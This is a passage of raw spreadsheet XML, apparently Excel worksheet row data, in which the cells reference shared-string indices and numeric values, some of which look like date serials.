        <v>14507</v>
      </c>
      <c r="F9973" t="s">
        <v>14507</v>
      </c>
    </row>
    <row r="9974" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9974" t="s">
        <v>14508</v>
      </c>
      <c r="B9974">
        <v>6510</v>
      </c>
      <c r="C9974" t="s">
        <v>1345</v>
      </c>
      <c r="D9974" t="s">
        <v>14509</v>
      </c>
      <c r="E9974" t="s">
        <v>3104</v>
      </c>
      <c r="F9974" t="s">
        <v>3104</v>
      </c>
    </row>
    <row r="9975" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9975" t="s">
        <v>14508</v>
      </c>
      <c r="B9975">
        <v>6510</v>
      </c>
      <c r="C9975" t="s">
        <v>1348</v>
      </c>
      <c r="D9975" t="s">
        <v>14509</v>
      </c>
      <c r="E9975" t="s">
        <v>3104</v>
      </c>
      <c r="F9975" t="s">
        <v>3104</v>
      </c>
    </row>
    <row r="9976" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B9976">
        <v>6511</v>
      </c>
      <c r="C9976" t="s">
        <v>1345</v>
      </c>
      <c r="D9976" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="9977" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9977" t="s">
        <v>14510</v>
      </c>
      <c r="B9977">
        <v>6511</v>
      </c>
      <c r="C9977" t="s">
        <v>1348</v>
      </c>
      <c r="D9977" t="s">
        <v>14511</v>
      </c>
      <c r="E9977" t="s">
        <v>1399</v>
      </c>
      <c r="F9977" t="s">
        <v>1400</v>
      </c>
      <c r="I9977" t="s">
        <v>14512</v>
      </c>
    </row>
    <row r="9978" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B9978" t="s">
        <v>14513</v>
      </c>
      <c r="D9978" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="9979" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9979" t="s">
        <v>14514</v>
      </c>
      <c r="B9979">
        <v>6513</v>
      </c>
      <c r="C9979" t="s">
        <v>1345</v>
      </c>
      <c r="D9979" t="s">
        <v>14515</v>
      </c>
      <c r="E9979" t="s">
        <v>1399</v>
      </c>
      <c r="F9979" t="s">
        <v>1400</v>
      </c>
      <c r="H9979">
        <v>42109</v>
      </c>
      <c r="I9979" t="s">
        <v>14516</v>
      </c>
    </row>
    <row r="9980" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B9980">
        <v>6513</v>
      </c>
      <c r="C9980" t="s">
        <v>1348</v>
      </c>
      <c r="D9980" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="9981" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9981" t="s">
        <v>14517</v>
      </c>
      <c r="B9981">
        <v>6514</v>
      </c>
      <c r="C9981" t="s">
        <v>1345</v>
      </c>
      <c r="D9981" t="s">
        <v>14518</v>
      </c>
      <c r="I9981" t="s">
        <v>14519</v>
      </c>
    </row>
    <row r="9982" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9982" t="s">
        <v>14517</v>
      </c>
      <c r="B9982">
        <v>6514</v>
      </c>
      <c r="C9982" t="s">
        <v>1348</v>
      </c>
      <c r="D9982" t="s">
        <v>14520</v>
      </c>
      <c r="I9982" t="s">
        <v>14521</v>
      </c>
    </row>
    <row r="9983" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9983" t="s">
        <v>14517</v>
      </c>
      <c r="B9983">
        <v>6514</v>
      </c>
      <c r="C9983" t="s">
        <v>1366</v>
      </c>
      <c r="D9983" t="s">
        <v>14520</v>
      </c>
      <c r="I9983" t="s">
        <v>14521</v>
      </c>
    </row>
    <row r="9984" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A9984" t="s">
        <v>14522</v>
      </c>
      <c r="B9984">
        <v>6515</v>
      </c>
      <c r="C9984" t="s">
        <v>1345</v>
      </c>
      <c r="D9984" t="s">
        <v>14523</v>
      </c>
      <c r="E9984" t="s">
        <v>14524</v>
      </c>
      <c r="F9984" t="s">
        <v>14524</v>
      </c>
      <c r="G9984">
        <v>39342</v>
      </c>
    </row>
    <row r="9985" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9985" t="s">
        <v>14522</v>
      </c>
      <c r="B9985">
        <v>6515</v>
      </c>
      <c r="C9985" t="s">
        <v>1348</v>
      </c>
      <c r="D9985" t="s">
        <v>14523</v>
      </c>
      <c r="E9985" t="s">
        <v>14524</v>
      </c>
      <c r="F9985" t="s">
        <v>14524</v>
      </c>
      <c r="G9985">
        <v>39342</v>
      </c>
    </row>
    <row r="9986" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B9986" t="s">
        <v>14525</v>
      </c>
      <c r="D9986" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="9987" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9987" t="s">
        <v>14526</v>
      </c>
      <c r="B9987">
        <v>6543</v>
      </c>
      <c r="C9987" t="s">
        <v>1345</v>
      </c>
      <c r="D9987" t="s">
        <v>14527</v>
      </c>
      <c r="E9987" t="s">
        <v>14528</v>
      </c>
      <c r="F9987" t="s">
        <v>14528</v>
      </c>
      <c r="G9987" t="s">
        <v>10446</v>
      </c>
    </row>
    <row r="9988" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9988" t="s">
        <v>14526</v>
      </c>
      <c r="B9988">
        <v>6543</v>
      </c>
      <c r="C9988" t="s">
        <v>1348</v>
      </c>
      <c r="D9988" t="s">
        <v>14527</v>
      </c>
      <c r="E9988" t="s">
        <v>14528</v>
      </c>
      <c r="F9988" t="s">
        <v>14528</v>
      </c>
      <c r="G9988" t="s">
        <v>10446</v>
      </c>
    </row>
    <row r="9989" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9989" t="s">
        <v>14529</v>
      </c>
      <c r="B9989">
        <v>6544</v>
      </c>
      <c r="C9989" t="s">
        <v>1345</v>
      </c>
      <c r="D9989" t="s">
        <v>14530</v>
      </c>
      <c r="E9989" t="s">
        <v>14528</v>
      </c>
      <c r="F9989" t="s">
        <v>14528</v>
      </c>
      <c r="G9989" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="9990" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9990" t="s">
        <v>14529</v>
      </c>
      <c r="B9990">
        <v>6544</v>
      </c>
      <c r="C9990" t="s">
        <v>1348</v>
      </c>
      <c r="D9990" t="s">
        <v>14530</v>
      </c>
      <c r="E9990" t="s">
        <v>14528</v>
      </c>
      <c r="F9990" t="s">
        <v>14528</v>
      </c>
      <c r="G9990" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="9991" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B9991" t="s">
        <v>14531</v>
      </c>
      <c r="D9991" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="9992" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9992" t="s">
        <v>14532</v>
      </c>
      <c r="B9992">
        <v>6547</v>
      </c>
      <c r="C9992" t="s">
        <v>1345</v>
      </c>
      <c r="D9992" t="s">
        <v>14533</v>
      </c>
      <c r="E9992" t="s">
        <v>6113</v>
      </c>
      <c r="F9992" t="s">
        <v>6113</v>
      </c>
    </row>
    <row r="9993" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9993" t="s">
        <v>14532</v>
      </c>
      <c r="B9993">
        <v>6547</v>
      </c>
      <c r="C9993" t="s">
        <v>1348</v>
      </c>
      <c r="D9993" t="s">
        <v>14533</v>
      </c>
      <c r="E9993" t="s">
        <v>6113</v>
      </c>
      <c r="F9993" t="s">
        <v>6113</v>
      </c>
    </row>
    <row r="9994" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9994" t="s">
        <v>14534</v>
      </c>
      <c r="B9994">
        <v>6548</v>
      </c>
      <c r="C9994" t="s">
        <v>1345</v>
      </c>
      <c r="D9994" t="s">
        <v>14535</v>
      </c>
      <c r="E9994" t="s">
        <v>6113</v>
      </c>
      <c r="F9994" t="s">
        <v>6113</v>
      </c>
    </row>
    <row r="9995" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9995" t="s">
        <v>14534</v>
      </c>
      <c r="B9995">
        <v>6548</v>
      </c>
      <c r="C9995" t="s">
        <v>1348</v>
      </c>
      <c r="D9995" t="s">
        <v>14535</v>
      </c>
      <c r="E9995" t="s">
        <v>6113</v>
      </c>
      <c r="F9995" t="s">
        <v>6113</v>
      </c>
    </row>
    <row r="9996" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9996" t="s">
        <v>14536</v>
      </c>
      <c r="B9996">
        <v>6549</v>
      </c>
      <c r="C9996" t="s">
        <v>1345</v>
      </c>
      <c r="D9996" t="s">
        <v>14537</v>
      </c>
      <c r="E9996" t="s">
        <v>6113</v>
      </c>
      <c r="F9996" t="s">
        <v>6113</v>
      </c>
    </row>
    <row r="9997" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9997" t="s">
        <v>14536</v>
      </c>
      <c r="B9997">
        <v>6549</v>
      </c>
      <c r="C9997" t="s">
        <v>1348</v>
      </c>
      <c r="D9997" t="s">
        <v>14537</v>
      </c>
      <c r="E9997" t="s">
        <v>6113</v>
      </c>
      <c r="F9997" t="s">
        <v>6113</v>
      </c>
    </row>
    <row r="9998" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9998" t="s">
        <v>14538</v>
      </c>
      <c r="B9998">
        <v>6550</v>
      </c>
      <c r="C9998" t="s">
        <v>1345</v>
      </c>
      <c r="D9998" t="s">
        <v>14538</v>
      </c>
      <c r="E9998" t="s">
        <v>14539</v>
      </c>
      <c r="F9998" t="s">
        <v>14539</v>
      </c>
    </row>
    <row r="9999" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9999" t="s">
        <v>14538</v>
      </c>
      <c r="B9999">
        <v>6550</v>
      </c>
      <c r="C9999" t="s">
        <v>1348</v>
      </c>
      <c r="D9999" t="s">
        <v>14538</v>
      </c>
      <c r="E9999" t="s">
        <v>14539</v>
      </c>
      <c r="F9999" t="s">
        <v>14539</v>
      </c>
    </row>
    <row r="10000" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A10000" t="s">
        <v>14540</v>
      </c>
      <c r="B10000">
        <v>6551</v>
      </c>
      <c r="C10000" t="s">
        <v>1345</v>
      </c>
      <c r="D10000" t="s">
        <v>14541</v>
      </c>
      <c r="E10000" t="s">
        <v>14542</v>
      </c>
      <c r="F10000" t="s">
        <v>14542</v>
      </c>
      <c r="G10000">
        <v>39429</v>
      </c>
    </row>
    <row r="10001" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10001" t="s">
        <v>14540</v>
      </c>
      <c r="B10001">
        <v>6551</v>
      </c>
      <c r="C10001" t="s">
        <v>1348</v>
      </c>
      <c r="D10001" t="s">
        <v>14541</v>
      </c>
      <c r="E10001" t="s">
        <v>14542</v>
      </c>
      <c r="F10001" t="s">
        <v>14542</v>
      </c>
      <c r="G10001">
        <v>39429</v>
      </c>
    </row>
    <row r="10002" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B10002" t="s">
        <v>14543</v>
      </c>
      <c r="D10002" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="10003" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10003" t="s">
        <v>14544</v>
      </c>
      <c r="B10003">
        <v>6558</v>
      </c>
      <c r="C10003" t="s">
        <v>1345</v>
      </c>
      <c r="E10003" t="s">
        <v>2538</v>
      </c>
      <c r="F10003" t="s">
        <v>2538</v>
      </c>
      <c r="L10003" t="s">
        <v>14545</v>
      </c>
    </row>
    <row r="10004" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10004" t="s">
        <v>14544</v>
      </c>
      <c r="B10004">
        <v>6558</v>
      </c>
      <c r="C10004" t="s">
        <v>1348</v>
      </c>
      <c r="E10004" t="s">
        <v>2538</v>
      </c>
      <c r="F10004" t="s">
        <v>2538</v>
      </c>
      <c r="L10004" t="s">
        <v>14545</v>
      </c>
    </row>
    <row r="10005" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B10005" t="s">
        <v>14546</v>
      </c>
      <c r="D10005" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="10006" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10006" t="s">
        <v>14547</v>
      </c>
      <c r="B10006">
        <v>6566</v>
      </c>
      <c r="C10006" t="s">
        <v>1345</v>
      </c>
      <c r="D10006" t="s">
        <v>14548</v>
      </c>
      <c r="E10006" t="s">
        <v>14549</v>
      </c>
      <c r="F10006" t="s">
        <v>14549</v>
      </c>
      <c r="G10006" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="10007" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10007" t="s">
        <v>14547</v>
      </c>
      <c r="B10007">
        <v>6566</v>
      </c>
      <c r="C10007" t="s">
        <v>1348</v>
      </c>
      <c r="D10007" t="s">
        <v>14548</v>
      </c>
      <c r="E10007" t="s">
        <v>14549</v>
      </c>
      <c r="F10007" t="s">
        <v>14549</v>
      </c>
      <c r="G10007" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="10008" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B10008">
        <v>6567</v>
      </c>
      <c r="D10008" t="s">
        <v>1346</v>
      </c>
      <c r="G10008" t="s">
        <v>3564</v>
      </c>
      <c r="H10008">
        <v>40781</v>
      </c>
      <c r="L10008" t="s">
        <v>14550</v>
      </c>
    </row>
    <row r="10009" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10009" t="s">
        <v>14551</v>
      </c>
      <c r="B10009">
        <v>6568</v>
      </c>
      <c r="C10009" t="s">
        <v>1345</v>
      </c>
      <c r="D10009" t="s">
        <v>14552</v>
      </c>
      <c r="E10009" t="s">
        <v>14553</v>
      </c>
      <c r="F10009" t="s">
        <v>14553</v>
      </c>
      <c r="G10009">
        <v>39925</v>
      </c>
      <c r="H10009">
        <v>42880</v>
      </c>
    </row>
    <row r="10010" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10010" t="s">
        <v>14554</v>
      </c>
      <c r="B10010">
        <v>6568</v>
      </c>
      <c r="C10010" t="s">
        <v>1345</v>
      </c>
      <c r="D10010" t="s">
        <v>14555</v>
      </c>
      <c r="E10010" t="s">
        <v>14553</v>
      </c>
      <c r="F10010" t="s">
        <v>14553</v>
      </c>
      <c r="G10010">
        <v>39925</v>
      </c>
      <c r="H10010">
        <v>42880</v>
      </c>
      <c r="L10010" t="s">
        <v>14556</v>
      </c>
    </row>
    <row r="10011" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10011" t="s">
        <v>14557</v>
      </c>
      <c r="B10011">
        <v>6568</v>
      </c>
      <c r="C10011" t="s">
        <v>1348</v>
      </c>
      <c r="D10011" t="s">
        <v>14558</v>
      </c>
      <c r="E10011" t="s">
        <v>14553</v>
      </c>
      <c r="F10011" t="s">
        <v>14553</v>
      </c>
      <c r="G10011">
        <v>40214</v>
      </c>
      <c r="H10011">
        <v>42880</v>
      </c>
    </row>
    <row r="10012" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B10012" t="s">
        <v>14559</v>
      </c>
      <c r="D10012" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="10013" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10013" t="s">
        <v>14560</v>
      </c>
      <c r="B10013">
        <v>6579</v>
      </c>
      <c r="C10013" t="s">
        <v>1345</v>
      </c>
      <c r="D10013" t="s">
        <v>14561</v>
      </c>
      <c r="E10013" t="s">
        <v>10063</v>
      </c>
      <c r="F10013" t="s">
        <v>10063</v>
      </c>
      <c r="G10013" t="s">
        <v>3578</v>
      </c>
    </row>
    <row r="10014" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10014" t="s">
        <v>14560</v>
      </c>
      <c r="B10014">
        <v>6579</v>
      </c>
      <c r="C10014" t="s">
        <v>1348</v>
      </c>
      <c r="D10014" t="s">
        <v>14561</v>
      </c>
      <c r="E10014" t="s">
        <v>10063</v>
      </c>
      <c r="F10014" t="s">
        <v>10063</v>
      </c>
      <c r="G10014" t="s">
        <v>3578</v>
      </c>
    </row>
    <row r="10015" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10015" t="s">
        <v>14562</v>
      </c>
      <c r="B10015">
        <v>6580</v>
      </c>
      <c r="C10015" t="s">
        <v>1345</v>
      </c>
      <c r="D10015" t="s">
        <v>14563</v>
      </c>
      <c r="E10015" t="s">
        <v>14564</v>
      </c>
      <c r="F10015" t="s">
        <v>14564</v>
      </c>
    </row>
    <row r="10016" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A10016" t="s">
        <v>14562</v>
      </c>
      <c r="B10016">
        <v>6580</v>
      </c>
      <c r="C10016" t="s">
        <v>1348</v>
      </c>
      <c r="D10016" t="s">
        <v>14563</v>
      </c>
      <c r="E10016" t="s">
        <v>14564</v>
      </c>
      <c r="F10016" t="s">
        <v>14564</v>
      </c>
    </row>
    <row r="10017" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10017" t="s">
        <v>14565</v>
      </c>
      <c r="B10017">
        <v>6581</v>
      </c>
      <c r="C10017" t="s">
        <v>1345</v>
      </c>
      <c r="D10017" t="s">
        <v>14566</v>
      </c>
      <c r="E10017" t="s">
        <v>14564</v>
      </c>
      <c r="F10017" t="s">
        <v>14564</v>
      </c>
    </row>
    <row r="10018" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10018" t="s">
        <v>14565</v>
      </c>
      <c r="B10018">
        <v>6581</v>
      </c>
      <c r="C10018" t="s">
        <v>1348</v>
      </c>
      <c r="D10018" t="s">
        <v>14566</v>
      </c>
      <c r="E10018" t="s">
        <v>14564</v>
      </c>
      <c r="F10018" t="s">
        <v>14564</v>
      </c>
    </row>
    <row r="10019" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10019" t="s">
        <v>14567</v>
      </c>
      <c r="B10019">
        <v>6582</v>
      </c>
      <c r="C10019" t="s">
        <v>1345</v>
      </c>
      <c r="D10019" t="s">
        <v>14568</v>
      </c>
      <c r="E10019" t="s">
        <v>14564</v>
      </c>
      <c r="F10019" t="s">
        <v>14564</v>
      </c>
    </row>
    <row r="10020" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10020" t="s">
        <v>14567</v>
      </c>
      <c r="B10020">
        <v>6582</v>
      </c>
      <c r="C10020" t="s">
        <v>1348</v>
      </c>
      <c r="D10020" t="s">
        <v>14568</v>
      </c>
      <c r="E10020" t="s">
        <v>14564</v>
      </c>
      <c r="F10020" t="s">
        <v>14564</v>
      </c>
    </row>
    <row r="10021" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10021" t="s">
        <v>14569</v>
      </c>
      <c r="B10021">
        <v>6583</v>
      </c>
      <c r="C10021" t="s">
        <v>1345</v>
      </c>
      <c r="D10021" t="s">
        <v>14570</v>
      </c>
      <c r="E10021" t="s">
        <v>14571</v>
      </c>
      <c r="F10021" t="s">
        <v>14571</v>
      </c>
      <c r="G10021" t="s">
        <v>3594</v>
      </c>
    </row>
    <row r="10022" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10022" t="s">
        <v>14569</v>
      </c>
      <c r="B10022">
        <v>6583</v>
      </c>
      <c r="C10022" t="s">
        <v>1348</v>
      </c>
      <c r="D10022" t="s">
        <v>14570</v>
      </c>
      <c r="E10022" t="s">
        <v>14571</v>
      </c>
      <c r="F10022" t="s">
        <v>14571</v>
      </c>
      <c r="G10022" t="s">
        <v>3594</v>
      </c>
    </row>
    <row r="10023" spans="1:11" x14ac:dyDescent="0.25">
      <c r="B10023" t="s">
        <v>14572</v>
      </c>
      <c r="D10023" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="10024" spans="1:11" x14ac:dyDescent="0.25">
      <c r="B10024">
        <v>6588</v>
      </c>
      <c r="D10024" t="s">
        <v>1356</v>
      </c>
      <c r="K10024" t="s">
        <v>14573</v>
      </c>
    </row>
    <row r="10025" spans="1:11" x14ac:dyDescent="0.25">
      <c r="B10025" t="s">
        <v>14574</v>
      </c>
      <c r="D10025" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="10026" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10026" t="s">
        <v>14575</v>
      </c>
      <c r="B10026">
        <v>6600</v>
      </c>
      <c r="C10026" t="s">
        <v>1345</v>
      </c>
      <c r="D10026" t="s">
        <v>14576</v>
      </c>
      <c r="E10026" t="s">
        <v>14577</v>
      </c>
      <c r="F10026" t="s">
        <v>14577</v>
      </c>
      <c r="G10026">
        <v>39847</v>
      </c>
    </row>
    <row r="10027" spans="1:11" x14ac:dyDescent="0.25">
      <c r="B10027">
        <v>6600</v>
      </c>
      <c r="C10027" t="s">
        <v>1348</v>
      </c>
      <c r="D10027" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="10028" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10028" t="s">
        <v>14578</v>
      </c>
      <c r="B10028">
        <v>6601</v>
      </c>
      <c r="C10028" t="s">
        <v>1345</v>
      </c>
      <c r="D10028" t="s">
        <v>14579</v>
      </c>
      <c r="E10028" t="s">
        <v>14580</v>
      </c>
      <c r="F10028" t="s">
        <v>14580</v>
      </c>
      <c r="G10028">
        <v>39937</v>
      </c>
    </row>
    <row r="10029" spans="1:11" x14ac:dyDescent="0.25">
      <c r="B10029">
        <v>6601</v>
      </c>
      <c r="C10029" t="s">
        <v>1348</v>
      </c>
      <c r="D10029" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="10030" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10030" t="s">
        <v>14581</v>
      </c>
      <c r="B10030">
        <v>6602</v>
      </c>
      <c r="C10030" t="s">
        <v>1345</v>
      </c>
      <c r="D10030" t="s">
        <v>14582</v>
      </c>
      <c r="E10030" t="s">
        <v>14583</v>
      </c>
      <c r="F10030" t="s">
        <v>14583</v>
      </c>
      <c r="G10030">
        <v>40400</v>
      </c>
    </row>
    <row r="10031" spans="1:11" x14ac:dyDescent="0.25">
      <c r="B10031">
        <v>6602</v>
      </c>
      <c r="C10031" t="s">
        <v>1348</v>
      </c>
      <c r="D10031" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="10032" spans="1:11" x14ac:dyDescent="0.25">
      <c r="B10032" t="s">
        <v>14584</v>
      </c>
      <c r="D10032" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="10033" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10033" t="s">
        <v>14585</v>
      </c>
      <c r="B10033">
        <v>6619</v>
      </c>
      <c r="C10033" t="s">
        <v>1345</v>
      </c>
      <c r="D10033" t="s">
        <v>14586</v>
      </c>
      <c r="E10033" t="s">
        <v>14587</v>
      </c>
      <c r="F10033" t="s">
        <v>14587</v>
      </c>
      <c r="G10033" t="s">
        <v>3545</v>
      </c>
      <c r="I10033" t="s">
        <v>9186</v>
      </c>
    </row>
    <row r="10034" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10034" t="s">
        <v>14585</v>
      </c>
      <c r="B10034">
        <v>6619</v>
      </c>
      <c r="C10034" t="s">
        <v>1348</v>
      </c>
      <c r="D10034" t="s">
        <v>14586</v>
      </c>
      <c r="E10034" t="s">
        <v>14587</v>
      </c>
      <c r="F10034" t="s">
        <v>14587</v>
      </c>
      <c r="G10034" t="s">
        <v>3545</v>
      </c>
      <c r="I10034" t="s">
        <v>9186</v>
      </c>
    </row>
    <row r="10035" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10035" t="s">
        <v>14588</v>
      </c>
      <c r="B10035">
        <v>6620</v>
      </c>
      <c r="C10035" t="s">
        <v>1345</v>
      </c>
      <c r="D10035" t="s">
        <v>14589</v>
      </c>
      <c r="E10035" t="s">
        <v>14590</v>
      </c>
      <c r="F10035" t="s">
        <v>14590</v>
      </c>
      <c r="G10035" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="10036" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10036" t="s">
        <v>14588</v>
      </c>
      <c r="B10036">
        <v>6620</v>
      </c>
      <c r="C10036" t="s">
        <v>1348</v>
      </c>
      <c r="D10036" t="s">
        <v>14589</v>
      </c>
      <c r="E10036" t="s">
        <v>14590</v>
      </c>
      <c r="F10036" t="s">
        <v>14590</v>
      </c>
      <c r="G10036" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="10037" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10037" t="s">
        <v>14591</v>
      </c>
      <c r="B10037">
        <v>6621</v>
      </c>
      <c r="C10037" t="s">
        <v>1345</v>
      </c>
      <c r="D10037" t="s">
        <v>14592</v>
      </c>
      <c r="E10037" t="s">
        <v>14590</v>
      </c>
      <c r="F10037" t="s">
        <v>14590</v>
      </c>
      <c r="G10037" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="10038" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10038" t="s">
        <v>14591</v>
      </c>
      <c r="B10038">
        <v>6621</v>
      </c>
      <c r="C10038" t="s">
        <v>1348</v>
      </c>
      <c r="D10038" t="s">
        <v>14592</v>
      </c>
      <c r="E10038" t="s">
        <v>14590</v>
      </c>
      <c r="F10038" t="s">
        <v>14590</v>
      </c>
      <c r="G10038" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="10039" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10039" t="s">
        <v>14593</v>
      </c>
      <c r="B10039">
        <v>6622</v>
      </c>
      <c r="C10039" t="s">
        <v>1345</v>
      </c>
      <c r="D10039" t="s">
        <v>14594</v>
      </c>
      <c r="E10039" t="s">
        <v>14595</v>
      </c>
      <c r="F10039" t="s">
        <v>14595</v>
      </c>
      <c r="G10039" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="10040" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10040" t="s">
        <v>14593</v>
      </c>
      <c r="B10040">
        <v>6622</v>
      </c>
      <c r="C10040" t="s">
        <v>1348</v>
      </c>
      <c r="D10040" t="s">
        <v>14594</v>
      </c>
      <c r="E10040" t="s">
        <v>14595</v>
      </c>
      <c r="F10040" t="s">
        <v>14595</v>
      </c>
      <c r="G10040" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="10041" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10041" t="s">
        <v>14596</v>
      </c>
      <c r="B10041">
        <v>6623</v>
      </c>
      <c r="C10041" t="s">
        <v>1345</v>
      </c>
      <c r="D10041" t="s">
        <v>14597</v>
      </c>
      <c r="E10041" t="s">
        <v>14590</v>
      </c>
      <c r="F10041" t="s">
        <v>14590</v>
      </c>
      <c r="G10041" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="10042" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10042" t="s">
        <v>14596</v>
      </c>
      <c r="B10042">
        <v>6623</v>
      </c>
      <c r="C10042" t="s">
        <v>1348</v>
      </c>
      <c r="D10042" t="s">
        <v>14597</v>
      </c>
      <c r="E10042" t="s">
        <v>14590</v>
      </c>
      <c r="F10042" t="s">
        <v>14590</v>
      </c>
      <c r="G10042" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="10043" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10043" t="s">
        <v>14598</v>
      </c>
      <c r="B10043">
        <v>6624</v>
      </c>
      <c r="C10043" t="s">
        <v>1345</v>
      </c>
      <c r="D10043" t="s">
        <v>14599</v>
      </c>
      <c r="E10043" t="s">
        <v>14600</v>
      </c>
      <c r="F10043" t="s">
        <v>14600</v>
      </c>
      <c r="G10043">
        <v>40217</v>
      </c>
    </row>
    <row r="10044" spans="1:9" x14ac:dyDescent="0.25">
      <c r="B10044">
        <v>6624</v>
      </c>
      <c r="C10044" t="s">
        <v>1348</v>
      </c>
      <c r="D10044" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="10045" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10045" t="s">
        <v>14601</v>
      </c>
      <c r="B10045">
        <v>6625</v>
      </c>
      <c r="C10045" t="s">
        <v>1345</v>
      </c>
      <c r="D10045" t="s">
        <v>14602</v>
      </c>
      <c r="E10045" t="s">
        <v>14600</v>
      </c>
      <c r="F10045" t="s">
        <v>14600</v>
      </c>
      <c r="G10045">
        <v>40217</v>
      </c>
    </row>
    <row r="10046" spans="1:9" x14ac:dyDescent="0.25">
      <c r="B10046">
        <v>6625</v>
      </c>
      <c r="C10046" t="s">
        <v>1348</v>
      </c>
      <c r="D10046" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="10047" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10047" t="s">
        <v>14603</v>
      </c>
      <c r="B10047">
        <v>6626</v>
      </c>
      <c r="C10047" t="s">
        <v>1345</v>
      </c>
      <c r="D10047" t="s">
        <v>14604</v>
      </c>
      <c r="E10047" t="s">
        <v>14605</v>
      </c>
      <c r="F10047" t="s">
        <v>14605</v>
      </c>
      <c r="G10047" t="s">
        <v>3535</v>
      </c>
    </row>
    <row r="10048" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A10048" t="s">
        <v>14603</v>
      </c>
      <c r="B10048">
        <v>6626</v>
      </c>
      <c r="C10048" t="s">
        <v>1348</v>
      </c>
      <c r="D10048" t="s">
        <v>14604</v>
      </c>
      <c r="E10048" t="s">
        <v>14605</v>
      </c>
      <c r="F10048" t="s">
        <v>14605</v>
      </c>
      <c r="G10048" t="s">
        <v>3535</v>
      </c>
    </row>
    <row r="10049" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A10049" t="s">
        <v>14606</v>
      </c>
      <c r="B10049">
        <v>6627</v>
      </c>
      <c r="C10049" t="s">
        <v>1345</v>
      </c>
      <c r="D10049" t="s">
        <v>14607</v>
